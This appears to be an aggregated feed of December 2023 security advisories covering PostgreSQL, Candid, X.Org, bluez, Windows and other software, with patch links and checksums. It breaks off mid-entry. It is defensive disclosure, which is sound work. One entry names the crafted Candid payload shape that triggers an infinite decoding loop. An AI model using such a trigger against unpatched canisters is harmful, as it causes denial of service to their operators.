09.12.2023 12:05:32rustsec[RUSTSEC-2023-0073] Infinite decoding loop through specially crafted payloadThe Candid library causes a Denial of Service while parsing a specially crafted payload with `empty` data type. For example, if the payload is `record { * ; empty }` and the canister interface expects `record { * }` then the rust candid decoder treats `empty` as an extra field required by the type. The problem with type `empty` is that the candid rust library wrongly categorizes `empty` as a recoverable error when skipping the field and thus causing an infinite decoding loop. Canisters using affected versions of candid are exposed to denial of service by causing the decoding to run indefinitely until the canister traps due to reaching maximum instruction limit per execution round. Repeated exposure to the payload will result in degraded performance of the canister.For asset canister users, `dfx` versions `>= 0.14.4` to `<= 0.15.2-beta.0` ships asset canister with an affected version of candid.### Unaffected - Rust canisters using candid `< 0.9.0` or `>= 0.9.10` - Rust canister interfaces of type other than `record { * }`- Motoko based canisters- dfx (for asset canister) `<= 0.14.3` or `>= 0.15.2`### References- [GitHub Security Advisory (GHSA-7787-p7x6-fq3j)](https://github.com/dfinity/candid/security/advisories/GHSA-7787-p7x6-fq3j)- [dfinity/candid/pull/478](https://github.com/dfinity/candid/pull/478)- [Candid Library Reference](https://internetcomputer.org/docs/current/references/candid-ref)- [Candid Specification](https://github.com/dfinity/candid/blob/master/spec/Candid.md)- [Internet Computer Specification](https://internetcomputer.org/docs/current/references/ic-interface-spec)https://secdb.nttzen.cloud/security-advisory/detail/RUSTSEC-2023-0073
10.12.2023 20:15:07alpinelinux[ALPINE:CVE-2023-5868] postgresql15, postgresql12, postgresql14, postgresql16 vulnerability[From CVE-2023-5868] A memory disclosure vulnerability was found in PostgreSQL that allows remote users to access sensitive information by exploiting certain aggregate function calls with 'unknown'-type arguments. Handling 'unknown'-type values from string literals without type designation can disclose bytes, potentially revealing notable and confidential information. This issue exists due to excessive data output in aggregate function calls, enabling remote users to read some portion of system memory.https://secdb.nttzen.cloud/security-advisory/detail/ALPINE:CVE-2023-5868
10.12.2023 20:15:07alpinelinux[ALPINE:CVE-2023-5869] postgresql15, postgresql14, postgresql12, postgresql16 vulnerability[From CVE-2023-5869] A flaw was found in PostgreSQL that allows authenticated database users to execute arbitrary code through missing overflow checks during SQL array value modification. This issue exists due to an integer overflow during array modification where a remote user can trigger the overflow by providing specially crafted data. This enables the execution of arbitrary code on the target system, allowing users to write arbitrary bytes to memory and extensively read the server's memory.https://secdb.nttzen.cloud/security-advisory/detail/ALPINE:CVE-2023-5869
10.12.2023 20:15:07alpinelinux[ALPINE:CVE-2023-5870] postgresql14, postgresql12, postgresql16, postgresql15 vulnerability[From CVE-2023-5870] A flaw was found in PostgreSQL involving the pg_cancel_backend role that signals background workers, including the logical replication launcher, autovacuum workers, and the autovacuum launcher. Successful exploitation requires a non-core extension with a less-resilient background worker and would affect that specific background worker only. This issue may allow a remote high privileged user to launch a denial of service (DoS) attack.https://secdb.nttzen.cloud/security-advisory/detail/ALPINE:CVE-2023-5870
12.12.2023 01:25:20ubuntu[USN-6548-1] Linux kernel vulnerabilitiesSeveral security issues were fixed in the Linux kernel.https://secdb.nttzen.cloud/security-advisory/detail/USN-6548-1
12.12.2023 01:13:39ubuntu[USN-6549-1] Linux kernel vulnerabilitiesSeveral security issues were fixed in the Linux kernel.https://secdb.nttzen.cloud/security-advisory/detail/USN-6549-1
11.12.2023 20:00:21ubuntu[USN-6547-1] Python vulnerabilityPython could be made to bypass security measures if it processed a malicious filename.https://secdb.nttzen.cloud/security-advisory/detail/USN-6547-1
11.12.2023 15:03:46ubuntu[USN-6546-1] LibreOffice vulnerabilitiesSeveral security issues were fixed in LibreOffice.https://secdb.nttzen.cloud/security-advisory/detail/USN-6546-1
11.12.2023 14:32:24ubuntu[USN-6545-1] WebKitGTK vulnerabilitiesSeveral security issues were fixed in WebKitGTK.https://secdb.nttzen.cloud/security-advisory/detail/USN-6545-1
11.12.2023 13:40:02ubuntu[USN-6500-2] Squid vulnerabilitiesSeveral security issues were fixed in Squid.https://secdb.nttzen.cloud/security-advisory/detail/USN-6500-2
11.12.2023 13:18:13ubuntu[USN-6544-1] GNU binutils vulnerabilitiesSeveral security issues were fixed in GNU binutils.https://secdb.nttzen.cloud/security-advisory/detail/USN-6544-1
11.12.2023 02:26:33ubuntu[USN-6543-1] GNU Tar vulnerabilitytar could be made to crash if it opened a specially crafted file.https://secdb.nttzen.cloud/security-advisory/detail/USN-6543-1
11.12.2023 15:16:59almalinux[ALSA-2023:7711] apr security update (moderate)apr security updatehttps://secdb.nttzen.cloud/security-advisory/detail/ALSA-2023:7711
12.12.2023 22:36:13ubuntu[USN-6548-2] Linux kernel vulnerabilitiesSeveral security issues were fixed in the Linux kernel.https://secdb.nttzen.cloud/security-advisory/detail/USN-6548-2
12.12.2023 19:47:24ubuntu[USN-6553-1] Pydantic vulnerabilityPydantic could be made to crash if it received specially crafted input.https://secdb.nttzen.cloud/security-advisory/detail/USN-6553-1
12.12.2023 17:22:20ubuntu[USN-6552-1] Netatalk vulnerabilityNetatalk could be made to crash or run programs if it received specially crafted network traffic.https://secdb.nttzen.cloud/security-advisory/detail/USN-6552-1
12.12.2023 15:24:07ubuntu[USN-6549-2] Linux kernel (GKE) vulnerabilitiesSeveral security issues were fixed in the Linux kernel.https://secdb.nttzen.cloud/security-advisory/detail/USN-6549-2
12.12.2023 15:16:33ubuntu[USN-6534-2] Linux kernel vulnerabilitiesSeveral security issues were fixed in the Linux kernel.https://secdb.nttzen.cloud/security-advisory/detail/USN-6534-2
12.12.2023 15:08:30ubuntu[USN-6551-1] Ghostscript vulnerabilityGhostscript could be made to crash if it wrote a TIFF file.https://secdb.nttzen.cloud/security-advisory/detail/USN-6551-1
12.12.2023 14:15:17ubuntu[USN-6550-1] PostfixAdmin vulnerabilitiesSeveral security issues were fixed in PostfixAdmin.https://secdb.nttzen.cloud/security-advisory/detail/USN-6550-1
12.12.2023 10:00:00msrc[MS:CVE-2023-36696] Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability (important)https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-36696
12.12.2023 10:00:00msrc[MS:CVE-2023-36391] Local Security Authority Subsystem Service Elevation of Privilege Vulnerability (important)https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-36391
12.12.2023 10:00:00msrc[MS:CVE-2023-36020] Microsoft Dynamics 365 (on-premises) Cross-site Scripting Vulnerability (important)https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-36020
12.12.2023 10:00:00msrc[MS:CVE-2023-36009] Microsoft Word Information Disclosure Vulnerability (important)https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-36009
12.12.2023 10:00:00msrc[MS:CVE-2023-36011] Win32k Elevation of Privilege Vulnerability (important)https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-36011
12.12.2023 10:00:00msrc[MS:CVE-2023-20588] AMD: CVE-2023-20588 AMD Speculative Leaks Security Notice (important)https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-20588
12.12.2023 10:00:00msrc[MS:CVE-2023-35625] Azure Machine Learning Compute Instance for SDK Users Information Disclosure Vulnerability (important)https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-35625
12.12.2023 10:00:00msrc[MS:CVE-2023-21740] Windows Media Remote Code Execution Vulnerability (important)https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-21740
12.12.2023 10:00:00msrc[MS:CVE-2023-36019] Microsoft Power Platform Connector Spoofing Vulnerability (critical)https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-36019
12.12.2023 10:00:00msrc[MS:CVE-2023-36010] Microsoft Defender Denial of Service Vulnerability (important)https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-36010
12.12.2023 10:00:00msrc[MS:CVE-2023-36012] DHCP Server Service Information Disclosure Vulnerability (important)https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-36012
12.12.2023 10:00:00msrc[MS:CVE-2023-36003] XAML Diagnostics Elevation of Privilege Vulnerability (important)https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-36003
12.12.2023 10:00:00msrc[MS:CVE-2023-36004] Windows DPAPI (Data Protection Application Programming Interface) Spoofing Vulnerability (important)https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-36004
12.12.2023 10:00:00msrc[MS:CVE-2023-36005] Windows Telephony Server Elevation of Privilege Vulnerability (important)https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-36005
12.12.2023 10:00:00msrc[MS:CVE-2023-36006] Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution Vulnerability (important)https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-36006
12.12.2023 10:00:00msrc[MS:CVE-2023-35638] DHCP Server Service Denial of Service Vulnerability (important)https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-35638
12.12.2023 10:00:00msrc[MS:CVE-2023-35639] Microsoft ODBC Driver Remote Code Execution Vulnerability (important)https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-35639
12.12.2023 10:00:00msrc[MS:CVE-2023-35641] Internet Connection Sharing (ICS) Remote Code Execution Vulnerability (critical)https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-35641
12.12.2023 10:00:00msrc[MS:CVE-2023-35642] Internet Connection Sharing (ICS) Denial of Service Vulnerability (important)https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-35642
12.12.2023 10:00:00msrc[MS:CVE-2023-35643] DHCP Server Service Information Disclosure Vulnerability (important)https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-35643
12.12.2023 10:00:00msrc[MS:CVE-2023-35644] Windows Sysmain Service Elevation of Privilege (important)https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-35644
12.12.2023 10:00:00msrc[MS:CVE-2023-35628] Windows MSHTML Platform Remote Code Execution Vulnerability (critical)https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-35628
12.12.2023 10:00:00msrc[MS:CVE-2023-35629] Microsoft USBHUB 3.0 Device Driver Remote Code Execution Vulnerability (important)https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-35629
12.12.2023 10:00:00msrc[MS:CVE-2023-35630] Internet Connection Sharing (ICS) Remote Code Execution Vulnerability (critical)https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-35630
12.12.2023 10:00:00msrc[MS:CVE-2023-35631] Win32k Elevation of Privilege Vulnerability (important)https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-35631
12.12.2023 10:00:00msrc[MS:CVE-2023-35632] Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability (important)https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-35632
12.12.2023 10:00:00msrc[MS:CVE-2023-35633] Windows Kernel Elevation of Privilege Vulnerability (important)https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-35633
12.12.2023 10:00:00msrc[MS:CVE-2023-35634] Windows Bluetooth Driver Remote Code Execution Vulnerability (important)https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-35634
12.12.2023 10:00:00msrc[MS:CVE-2023-35635] Windows Kernel Denial of Service Vulnerability (important)https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-35635
12.12.2023 10:00:00msrc[MS:CVE-2023-35636] Microsoft Outlook Information Disclosure Vulnerability (important)https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-35636
12.12.2023 10:00:00msrc[MS:CVE-2023-35619] Microsoft Outlook for Mac Spoofing Vulnerability (important)https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-35619
12.12.2023 10:00:00msrc[MS:CVE-2023-35621] Microsoft Dynamics 365 Finance and Operations Denial of Service Vulnerability (important)https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-35621
12.12.2023 10:00:00msrc[MS:CVE-2023-35622] Windows DNS Spoofing Vulnerability (important)https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-35622
12.12.2023 10:00:00msrc[MS:CVE-2023-35624] Azure Connected Machine Agent Elevation of Privilege Vulnerability (important)https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-35624
12.12.2023 04:15:06alpinelinux[ALPINE:CVE-2023-46219] curl vulnerability[From CVE-2023-46219] When saving HSTS data to an excessively long file name, curl could end up removing all contents, making subsequent requests using that file unaware of the HSTS status they should otherwise use.https://secdb.nttzen.cloud/security-advisory/detail/ALPINE:CVE-2023-46219
12.12.2023 02:00:00mozilla[MFSA-2023-53] Timing side-channel in PKCS#1 v1.5 decryption depadding code (moderate)*Although this issue was embargoed until 2023, it was fixed in NSS 3.61 as released on January 22, 2021*https://secdb.nttzen.cloud/security-advisory/detail/MFSA-2023-53
12.12.2023 02:00:00vmware[VMSA-2023-0027] VMware Workspace ONE Launcher updates address privilege escalation vulnerability. (CVE-2023-34064) (moderate)https://secdb.nttzen.cloud/security-advisory/detail/VMSA-2023-0027
12.12.2023 09:49:58almalinux[ALSA-2023:7715] webkit2gtk3 security update (important)webkit2gtk3 security updatehttps://secdb.nttzen.cloud/security-advisory/detail/ALSA-2023:7715
12.12.2023 09:53:08almalinux[ALSA-2023:7712] tracker-miners security update (important)tracker-miners security updatehttps://secdb.nttzen.cloud/security-advisory/detail/ALSA-2023:7712
14.12.2023 00:08:24slackware[SSA:2023-347-01] xorg-server
New xorg-server packages are available for Slackware 15.0 and -current to fix security issues.

**Here are the details from the Slackware 15.0 ChangeLog**

```
patches/packages/xorg-server-1.20.14-i586-10_slack15.0.txz: Rebuilt.
  This update fixes two security issues:
  Out-of-bounds memory write in XKB button actions.
  Out-of-bounds memory read in RRChangeOutputProperty and RRChangeProviderProperty.
  For more information, see:
    https://lists.x.org/archives/xorg/2023-December/061517.html
    https://www.cve.org/CVERecord?id=CVE-2023-6377
    https://www.cve.org/CVERecord?id=CVE-2023-6478
  (* Security fix *)
patches/packages/xorg-server-xephyr-1.20.14-i586-10_slack15.0.txz: Rebuilt.
patches/packages/xorg-server-xnest-1.20.14-i586-10_slack15.0.txz: Rebuilt.
patches/packages/xorg-server-xvfb-1.20.14-i586-10_slack15.0.txz: Rebuilt.
patches/packages/xorg-server-xwayland-21.1.4-i586-9_slack15.0.txz: Rebuilt.
  This update fixes two security issues:
  Out-of-bounds memory write in XKB button actions.
  Out-of-bounds memory read in RRChangeOutputProperty and RRChangeProviderProperty.
  For more information, see:
    https://lists.x.org/archives/xorg/2023-December/061517.html
    https://www.cve.org/CVERecord?id=CVE-2023-6377
    https://www.cve.org/CVERecord?id=CVE-2023-6478
  (* Security fix *)
```

**Where to find the new packages**

Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-)

Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you.

Updated packages for Slackware 15.0:
ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/xorg-server-1.20.14-i586-10_slack15.0.txz
ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/xorg-server-xephyr-1.20.14-i586-10_slack15.0.txz
ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/xorg-server-xnest-1.20.14-i586-10_slack15.0.txz
ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/xorg-server-xvfb-1.20.14-i586-10_slack15.0.txz
ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/xorg-server-xwayland-21.1.4-i586-9_slack15.0.txz

Updated packages for Slackware x86_64 15.0:
ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/xorg-server-1.20.14-x86_64-10_slack15.0.txz
ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/xorg-server-xephyr-1.20.14-x86_64-10_slack15.0.txz
ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/xorg-server-xnest-1.20.14-x86_64-10_slack15.0.txz
ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/xorg-server-xvfb-1.20.14-x86_64-10_slack15.0.txz
ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/xorg-server-xwayland-21.1.4-x86_64-9_slack15.0.txz

Updated packages for Slackware -current:
ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/x/xorg-server-21.1.10-i586-1.txz
ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/x/xorg-server-xephyr-21.1.10-i586-1.txz
ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/x/xorg-server-xnest-21.1.10-i586-1.txz
ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/x/xorg-server-xvfb-21.1.10-i586-1.txz
ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/x/xorg-server-xwayland-23.2.3-i586-1.txz

Updated packages for Slackware x86_64 -current:
ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/x/xorg-server-21.1.10-x86_64-1.txz
ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/x/xorg-server-xephyr-21.1.10-x86_64-1.txz
ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/x/xorg-server-xnest-21.1.10-x86_64-1.txz
ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/x/xorg-server-xvfb-21.1.10-x86_64-1.txz
ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/x/xorg-server-xwayland-23.2.3-x86_64-1.txz

**MD5 signatures**

Slackware 15.0 packages:
5065df8537bef75dc7ffde17aa11f46f  xorg-server-1.20.14-i586-10_slack15.0.txz
11c84ae8ec6a1d73d61f5ddb96c4067d  xorg-server-xephyr-1.20.14-i586-10_slack15.0.txz
0b764f40f2e595eacb196b2488e763e9  xorg-server-xnest-1.20.14-i586-10_slack15.0.txz
7b9183ff3e37d690656b842271594fe8  xorg-server-xvfb-1.20.14-i586-10_slack15.0.txz
8c6c7932e873f338257993f49f927964  xorg-server-xwayland-21.1.4-i586-9_slack15.0.txz

Slackware x86_64 15.0 packages:
da39c16aaafb5ec7d1a6eee65f8d8907  xorg-server-1.20.14-x86_64-10_slack15.0.txz
c580b794181367dc804a933405ef1b6a  xorg-server-xephyr-1.20.14-x86_64-10_slack15.0.txz
db09cf6d5b4537841cb853eb4741d32c  xorg-server-xnest-1.20.14-x86_64-10_slack15.0.txz
84fba92b3df08bf3a439e411809ccde9  xorg-server-xvfb-1.20.14-x86_64-10_slack15.0.txz
93f52b3bc807038878c247b0f0d919e3  xorg-server-xwayland-21.1.4-x86_64-9_slack15.0.txz

Slackware -current packages:
e9650746a65f118b4781e10786a4874b  x/xorg-server-21.1.10-i586-1.txz
f086a4ddbc545608eefa2714e1a1989b  x/xorg-server-xephyr-21.1.10-i586-1.txz
b3645e16f3ad489ef967ad12a6ddcfb4  x/xorg-server-xnest-21.1.10-i586-1.txz
6fa25c40cf42830cc87745dc05c5452c  x/xorg-server-xvfb-21.1.10-i586-1.txz
d4835717765da3d0164c2d7e153e35ba  x/xorg-server-xwayland-23.2.3-i586-1.txz

Slackware x86_64 -current packages:
17293df09996e5f8b21c396208e762ef  x/xorg-server-21.1.10-x86_64-1.txz
33fe37ac542d5a84aca927596dcea037  x/xorg-server-xephyr-21.1.10-x86_64-1.txz
651bd878005ed1dd9b97e6459543282d  x/xorg-server-xnest-21.1.10-x86_64-1.txz
1bffc1de5d6627a1aca85c6dee6ec917  x/xorg-server-xvfb-21.1.10-x86_64-1.txz
da4941dc6da69b3a0f7b0467127e6301  x/xorg-server-xwayland-23.2.3-x86_64-1.txz

**Installation instructions**

Upgrade the packages as root:
`# upgradepkg xorg-server-*.txz`
https://secdb.nttzen.cloud/security-advisory/detail/SSA:2023-347-01
13.12.2023 19:41:03ubuntu[USN-6555-2] X.Org X Server vulnerabilitiesSeveral security issues were fixed in X.Org X Server.https://secdb.nttzen.cloud/security-advisory/detail/USN-6555-2
13.12.2023 16:09:42ubuntu[USN-6548-3] Linux kernel (Oracle) vulnerabilitiesSeveral security issues were fixed in the Linux kernel.https://secdb.nttzen.cloud/security-advisory/detail/USN-6548-3
13.12.2023 16:01:01ubuntu[USN-6549-3] Linux kernel (Low Latency) vulnerabilitiesSeveral security issues were fixed in the Linux kernel.https://secdb.nttzen.cloud/security-advisory/detail/USN-6549-3
13.12.2023 15:55:58ubuntu[USN-6534-3] Linux kernel vulnerabilitiesSeveral security issues were fixed in the Linux kernel.https://secdb.nttzen.cloud/security-advisory/detail/USN-6534-3
13.12.2023 15:23:48ubuntu[USN-6555-1] X.Org X Server vulnerabilitiesSeveral security issues were fixed in X.Org X Server.https://secdb.nttzen.cloud/security-advisory/detail/USN-6555-1
13.12.2023 17:03:28composer[PHP:IN2CODE-FEMANAGER-2023-50459] TYPO3-EXT-SA-2023-010: Broken Access Control in extension "femanager" (femanager)https://secdb.nttzen.cloud/security-advisory/detail/PHP:IN2CODE-FEMANAGER-2023-50459
13.12.2023 10:00:00msrc[MS:CVE-2023-21751] Azure DevOps Server Spoofing Vulnerability (important)https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-21751
13.12.2023 04:21:14ubuntu[USN-6554-1] GNOME Settings vulnerabilityGNOME Settings could allow unintended access to network services.https://secdb.nttzen.cloud/security-advisory/detail/USN-6554-1
13.12.2023 17:03:28composer[PHP:DIRECTMAILTEAM-DIRECT-MAIL-2023-50461] TYPO3-EXT-SA-2023-011: Configuration Injection in extension "Direct Mail" (direct_mail)https://secdb.nttzen.cloud/security-advisory/detail/PHP:DIRECTMAILTEAM-DIRECT-MAIL-2023-50461
13.12.2023 10:00:00msrc[MS:CVE-2023-35641] Internet Connection Sharing (ICS) Remote Code Execution Vulnerability (critical)https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-35641
14.12.2023 23:21:52ubuntu[USN-6488-2] strongSwan vulnerabilitystrongSwan could be made to crash or run programs if it received specially crafted network traffic.https://secdb.nttzen.cloud/security-advisory/detail/USN-6488-2
14.12.2023 22:13:02slackware[SSA:2023-348-01] bluez
New bluez packages are available for Slackware 15.0 and -current to fix a security issue.

**Here are the details from the Slackware 15.0 ChangeLog**

```
patches/packages/bluez-5.71-i586-1_slack15.0.txz: Upgraded.
  This update fixes a security issue:
  It may have been possible for an attacker within Bluetooth range to
  inject keystrokes (and possibly execute commands) while devices were
  discoverable.
  Thanks to marav for the heads-up.
  For more information, see:
    https://www.cve.org/CVERecord?id=CVE-2023-45866
  (* Security fix *)
```

**Where to find the new packages**

Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-)

Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you.

Updated package for Slackware 15.0:
ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/bluez-5.71-i586-1_slack15.0.txz

Updated package for Slackware x86_64 15.0:
ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/bluez-5.71-x86_64-1_slack15.0.txz

Updated package for Slackware -current:
ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/bluez-5.71-i586-1.txz

Updated package for Slackware x86_64 -current:
ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/bluez-5.71-x86_64-1.txz

**MD5 signatures**

Slackware 15.0 package:
f59a88ade851b78edbadf0ec910d83e1  bluez-5.71-i586-1_slack15.0.txz

Slackware x86_64 15.0 package:
3ed936ff00a912cd10407733326671ef  bluez-5.71-x86_64-1_slack15.0.txz

Slackware -current package:
6bc0e55e55d4e9c8a41cccf1c1c97232  n/bluez-5.71-i586-1.txz

Slackware x86_64 -current package:
f31302d1c2ec6774f06cb55ba42a8ea1  n/bluez-5.71-x86_64-1.txz

**Installation instructions**

Upgrade the package as root:
`# upgradepkg bluez-5.71-i586-1_slack15.0.txz`
https://secdb.nttzen.cloud/security-advisory/detail/SSA:2023-348-01
14.12.2023 19:31:12ubuntu[USN-6557-1] Vim vulnerabilitiesSeveral security issues were fixed in Vim.https://secdb.nttzen.cloud/security-advisory/detail/USN-6557-1
14.12.2023 18:51:18ubuntu[USN-6233-2] YAJL vulnerabilitiesSeveral security issues were fixed in YAJL.https://secdb.nttzen.cloud/security-advisory/detail/USN-6233-2
14.12.2023 18:44:57ubuntu[USN-6558-1] audiofile vulnerabilitiesSeveral security issues were fixed in audiofile.https://secdb.nttzen.cloud/security-advisory/detail/USN-6558-1
14.12.2023 17:56:03ubuntu[USN-6556-1] Budgie Extras vulnerabilitiesSeveral security issues were fixed in budgie-extras.https://secdb.nttzen.cloud/security-advisory/detail/USN-6556-1
14.12.2023 14:33:02ubuntu[USN-6546-2] LibreOffice vulnerabilitiesSeveral security issues were fixed in LibreOffice.https://secdb.nttzen.cloud/security-advisory/detail/USN-6546-2
14.12.2023 10:00:00msrc[MS:CVE-2023-6702] Chromium: CVE-2023-6702 Type Confusion in V8https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-6702
14.12.2023 10:00:00msrc[MS:CVE-2023-6703] Chromium: CVE-2023-6703 Use after free in Blinkhttps://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-6703
14.12.2023 10:00:00msrc[MS:CVE-2023-6704] Chromium: CVE-2023-6704 Use after free in libavifhttps://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-6704
14.12.2023 10:00:00msrc[MS:CVE-2023-6705] Chromium: CVE-2023-6705 Use after free in WebRTChttps://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-6705
14.12.2023 10:00:00msrc[MS:CVE-2023-6706] Chromium: CVE-2023-6706 Use after free in FedCMhttps://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-6706
14.12.2023 10:00:00msrc[MS:CVE-2023-6707] Chromium: CVE-2023-6707 Use after free in CSShttps://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-6707
14.12.2023 10:00:00msrc[MS:CVE-2023-36878] Microsoft Edge (Chromium-based) Security Feature Bypass Vulnerability (low)https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-36878
14.12.2023 13:47:46almalinux[ALSA-2023:7784] postgresql security update (important)postgresql security updatehttps://secdb.nttzen.cloud/security-advisory/detail/ALSA-2023:7784
14.12.2023 11:39:25almalinux[ALSA-2023:7791] gstreamer1-plugins-bad-free security update (important)gstreamer1-plugins-bad-free security updatehttps://secdb.nttzen.cloud/security-advisory/detail/ALSA-2023:7791
14.12.2023 11:39:22almalinux[ALSA-2023:7732] tracker-miners security update (important)tracker-miners security updatehttps://secdb.nttzen.cloud/security-advisory/detail/ALSA-2023:7732
14.12.2023 11:39:26almalinux[ALSA-2023:7747] libxml2 security update (moderate)libxml2 security updatehttps://secdb.nttzen.cloud/security-advisory/detail/ALSA-2023:7747
14.12.2023 11:39:30almalinux[ALSA-2023:7754] pixman security update (moderate)pixman security updatehttps://secdb.nttzen.cloud/security-advisory/detail/ALSA-2023:7754
14.12.2023 11:39:21almalinux[ALSA-2023:7763] runc security update (moderate)runc security updatehttps://secdb.nttzen.cloud/security-advisory/detail/ALSA-2023:7763
14.12.2023 11:39:21almalinux[ALSA-2023:7766] containernetworking-plugins security update (moderate)containernetworking-plugins security updatehttps://secdb.nttzen.cloud/security-advisory/detail/ALSA-2023:7766
14.12.2023 11:39:23almalinux[ALSA-2023:7762] skopeo security update (moderate)skopeo security updatehttps://secdb.nttzen.cloud/security-advisory/detail/ALSA-2023:7762
14.12.2023 11:39:24almalinux[ALSA-2023:7764] buildah security update (moderate)buildah security updatehttps://secdb.nttzen.cloud/security-advisory/detail/ALSA-2023:7764
14.12.2023 11:39:38almalinux[ALSA-2023:7765] podman security update (moderate)podman security updatehttps://secdb.nttzen.cloud/security-advisory/detail/ALSA-2023:7765
14.12.2023 10:49:17almalinux[ALSA-2023:7716] webkit2gtk3 security update (important)webkit2gtk3 security updatehttps://secdb.nttzen.cloud/security-advisory/detail/ALSA-2023:7716
14.12.2023 10:00:00msrc[MS:CVE-2023-35618] Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability (moderate)https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-35618
14.12.2023 10:00:00msrc[MS:CVE-2023-38174] Microsoft Edge (Chromium-based) Information Disclosure Vulnerability (low)https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-38174
14.12.2023 10:00:00msrc[MS:CVE-2023-36880] Microsoft Edge (Chromium-based) Information Disclosure Vulnerability (low)https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-36880
14.12.2023 10:59:00almalinux[ALSA-2023:7668] squid:4 security update (important)squid:4 security updatehttps://secdb.nttzen.cloud/security-advisory/detail/ALSA-2023:7668
15.12.2023 11:13:53almalinux[ALSA-2023:7841] gstreamer1-plugins-bad-free security update (important)gstreamer1-plugins-bad-free security updatehttps://secdb.nttzen.cloud/security-advisory/detail/ALSA-2023:7841
15.12.2023 11:22:31almalinux[ALSA-2023:7836] avahi security update (moderate)avahi security updatehttps://secdb.nttzen.cloud/security-advisory/detail/ALSA-2023:7836
15.12.2023 12:41:00suse[SUSE-SU-2023:4883-1] Security update for the Linux Kernel (important)Security update for the Linux Kernelhttps://secdb.nttzen.cloud/security-advisory/detail/SUSE-SU-2023:4883-1
15.12.2023 12:40:45suse[SUSE-SU-2023:4882-1] Security update for the Linux Kernel (important)Security update for the Linux Kernelhttps://secdb.nttzen.cloud/security-advisory/detail/SUSE-SU-2023:4882-1
16.12.2023 15:54:14rubysec[RUBYSEC:ACTIVEADMIN-2023-50448] Potential CSV export data leak (high)
### Impact
In ActiveAdmin versions prior to 2.12.0, a concurrency issue was found that could allow a malicious actor to access potentially private data that belongs to another user.

The bug affects the functionality to export data as CSV files, and was caused by a variable holding the collection to be exported being shared across threads and not properly synchronized.

